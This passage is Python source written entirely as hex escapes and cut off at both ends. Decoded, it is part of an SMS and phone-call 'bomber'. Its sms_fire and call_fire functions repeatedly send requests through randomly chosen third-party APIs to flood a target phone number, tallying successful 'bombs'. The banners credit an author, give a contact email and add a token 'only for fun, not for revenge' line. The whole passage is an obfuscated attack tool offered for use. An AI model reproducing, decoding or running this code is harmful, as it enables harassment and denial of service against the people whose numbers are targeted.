\x74\x20\x57\x69\x6c\x6c\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4f\x6e\x6c\x79\x27\x20\x2b\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x20\x2b\x20\x27\x20\x43\x61\x6c\x6c\x73\x20\x41\x74\x20\x4f\x6e\x63\x65\x2e\x2e\x21\x5c\x6e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x4e\x75\x6d\x62\x65\x72\x20\x4f\x66\x20\x43\x61\x6c\x6c\x73\x20\x48\x61\x73\x20\x62\x65\x65\x6e\x20\x53\x65\x74\x20\x54\x6f\x20\x27\x20\x2b\x20\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x6d\x61\x78\x6c\x69\x6d\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x73\x6d\x73\x5f\x66\x69\x72\x65\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b
\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x69\x6e\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x20\x2d\x20\x69\x6e\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x0a\x20\x20\x20\x20\x62\x6f\x6d\x62\x73\x20\x3d\x20\x69\x6e\x74\x28\x63\x6f\x75\x6e\x74\x65\x72\x29\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3c\x20\x28\x69\x6e\x74\x28\x62\x6f\x6d\x62\x73\x29\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x70\x69\x20\x3d\x20\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x68\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x21\x20\x41\x6c\x6c\x20\x41\x50\x49\x73\x20\x48\x61\x76\x65\x20\x45\x78\x70\x69\x72\x65\x64\x20\x50\x6c\x65\x61\x73\x65\x20\x55\x70\x64\x61\x74\x65\x20\x42\x6f\x6d\x62\x20\x4f\x72\x20\x52\x75\x6e\x20\x49\x74\x20\x41\x67\x61\x69\x6e\x2e\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d
\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x57\x65\x20\x41\x72\x65\x20\x53\x6f\x72\x72\x79\x20\x54\x6f\x20\x53\x61\x79\x20\x54\x68\x61\x74\x20\x42\x6f\x6d\x62\x69\x6e\x67\x20\x4c\x69\x6d\x69\x74\x20\x46\x6f\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x48\x61\x73\x20\x42\x65\x65\x6e\x20\x52\x65\x61\x63\x68\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x57\x65\x20\x41\x72\x65\x20\x57\x6f\x72\x6b\x69\x6e\x67\x20\x54\x6f\x6f\x20\x48\x61\x72\x64\x20\x54\x6f\x20\x49\x6e\x63\x72\x65\x61\x73\x65\x20\x54\x68\x65\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x20\x4c\x69\x6d\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x54\x68\x69\x73\x20\x77\x69\x6c\x6c\x20\x68\x65\x6c\x70\x20\x75\x73\x20\x74\x6f\x20\x67\x69\x76\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x20\x74\x6f\x20\x79\x6f\x75\x72\x20\x63\x6f\x75\x6e\x74\x72\x79\x20\x66\x61\x73\x74\x2e\x2e\x2e\x5c\x6e\x5c\x6e\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x45\x78\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x69\x73\x20\x4e\x6f\x74\x20\x53\x75\x70\x70\x6f\x72\x74\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x50\x6c\x65\x61\x73\x65\x20\x53\x65\x6e\x64\x20\x41\x20\x4d\x61\x69\x6c\x20\x54\x6f\x20\x68\x61\x73\x61\x6e\x66\x69\x72\x6e\x61\x73\x32\x34\x32\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x20\x54\x6f\x20\x4c\x65\x74\x20\x55\x73\x20\x4b\x6e\x6f\x77\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x2b\x7b\x30\x7d\x20\x7b\x31\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x74\x72\x28\x63\x63\x29\x2c\x74\x61\x72\x67\x65\x74\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x20\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x53\x65\x6e\x74\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x75\x63\x63\x65\x73\x73\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x46\x61\x69\x6c\x65\x64\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x55\x73\x65\x20\x74\x68\x69\x73\x20\x4f\x6e\x6c\x79\x20\x66\x6f\x72\x20\x66\x75\x6e\x2c\x20\x6e\x6f\x74\x20\x66\x6f\x72\x20\x72\x65\x76\x65\x6e\x67\x65\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66
\x6f\x72\x6d\x61\x74\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x6f\x6c\x6f\x72\x73\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x68\x69\x73\x20\x42\x6f\x6d\x62\x65\x72\x20\x57\x61\x73\x20\x43\x72\x65\x61\x74\x65\x64\x20\x42\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x67\x65\x74\x5f\x61\x70\x69\x28\x74\x61\x72\x67\x65\x74\x2c\x61\x70\x69\x2c\x63\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x73\x75\x6c\x74\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x73\x75\x63\x63\x65\x73\x73\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x66\x61\x69\x6c\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20
\x20\x20\x20\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x63\x68\x2e\x63\x6f\x75\x6e\x74\x28\x61\x70\x69\x29\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x2e\x72\x65\x6d\x6f\x76\x65\x28\x61\x70\x69\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x66\x6c\x6f\x61\x74\x28\x64\x65\x6c\x61\x79\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x25\x20\x33\x20\x3d\x3d\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x65\x74\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x57\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x42\x6f\x6d\x62\x69\x6e\x67\x20\x43\x6f\x6d\x70\x6c\x65\x74\x65\x64\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x63\x61\x6c\x6c\x5f\x66\x69\x72\x65\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20
\x69\x6e\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x20\x2d\x20\x69\x6e\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x0a\x20\x20\x20\x20\x62\x6f\x6d\x62\x73\x20\x3d\x20\x69\x6e\x74\x28\x63\x6f\x75\x6e\x74\x65\x72\x29\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3c\x20\x28\x69\x6e\x74\x28\x62\x6f\x6d\x62\x73\x29\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x61\x70\x69\x20\x3d\x20\x31\x30\x33\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x70\x69\x20\x3d\x20\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x68\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x21\x20\x41\x6c\x6c\x20\x41\x50\x49\x73\x20\x48\x61\x76\x65\x20\x45\x78\x70\x69\x72\x65\x64\x20\x50\x6c\x65\x61\x73\x65\x20\x55\x70\x64\x61\x74\x65\x20\x42\x6f\x6d\x62\x20\x4f\x72\x20\x52\x75\x6e\x20\x49\x74\x20\x41\x67\x61\x69\x6e\x2e\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x57\x65\x20\x41\x72\x65\x20\x53\x6f\x72\x72\x79\x20\x54\x6f\x20\x53\x61\x79\x20\x54\x68\x61\x74\x20\x42\x6f\x6d\x62\x69
\x6e\x67\x20\x4c\x69\x6d\x69\x74\x20\x46\x6f\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x48\x61\x73\x20\x42\x65\x65\x6e\x20\x52\x65\x61\x63\x68\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x57\x65\x20\x41\x72\x65\x20\x57\x6f\x72\x6b\x69\x6e\x67\x20\x54\x6f\x6f\x20\x48\x61\x72\x64\x20\x54\x6f\x20\x49\x6e\x63\x72\x65\x61\x73\x65\x20\x54\x68\x65\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x20\x4c\x69\x6d\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x54\x68\x69\x73\x20\x77\x69\x6c\x6c\x20\x68\x65\x6c\x70\x20\x75\x73\x20\x74\x6f\x20\x67\x69\x76\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x20\x74\x6f\x20\x79\x6f\x75\x72\x20\x63\x6f\x75\x6e\x74\x72\x79\x20\x66\x61\x73\x74\x2e\x2e\x2e\x5c\x6e\x5c\x6e\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x45\x78\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x69\x73\x20\x4e\x6f\x74\x20\x53\x75\x70\x70\x6f\x72\x74\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x50\x6c\x65\x61\x73\x65\x20\x53\x65\x6e\x64\x20\x41\x20\x4d\x61\x69\x6c\x20\x54\x6f\x20\x68\x61\x73\x61\x6e\x66\x69\x72\x6e\x61\x73\x32\x34\x32\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x20\x54\x6f\x20\x4c\x65
